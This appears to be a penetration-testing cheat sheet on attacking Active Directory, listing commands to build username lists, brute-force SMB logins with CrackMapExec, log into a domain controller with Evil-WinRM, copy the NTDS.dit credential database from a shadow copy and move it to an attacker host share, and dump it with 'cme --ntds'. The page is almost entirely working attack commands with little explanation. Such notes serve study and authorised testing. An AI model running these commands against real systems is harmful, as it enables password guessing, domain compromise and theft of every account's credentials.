Attacking Active Directory & NTDS.dit

Dictionary Attacks against AD accounts using CrackMapExec

Creating a Custom list of Usernames

Username Anarchy

# Installation - <https://github.com/urbanadventurer/username-anarchy>

# Usage, names.txt contains usernames that we have gathered during information gathering
./username-anarchy -i names.txt

Launching the Attack with CrackMapExec

# Brute forcing against valid username
crackmapexec smb ip -u bwilliamson -p /usr/share/wordlists/fasttrack.txt

Capturing NTDS.dit

# Connecting to a DC with Evil-WinRM with valid user/pass
evil-winrm -i ip  -u eren -p pas

# Checking Local Group Membership
net localgroup

# Checking User Account Privileges including Domain
net user eren

# Creating Shadow Copy of C:
vssadmin CREATE SHADOW /For=C:

# Copying NTDS.dit from the VSS
cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit

# Transferring NTDS.dit to Attack Host using smbserver
cmd.exe /c move C:\\NTDS\\NTDS.dit \\\\attackerip\\CompData

Using cme to Capture NTDS.dit

crackmapexec smb ip -u eren -p pass --ntds

PreviousAttacking LSASS NextCredential Hunting in Windows

Last updated 2 years ago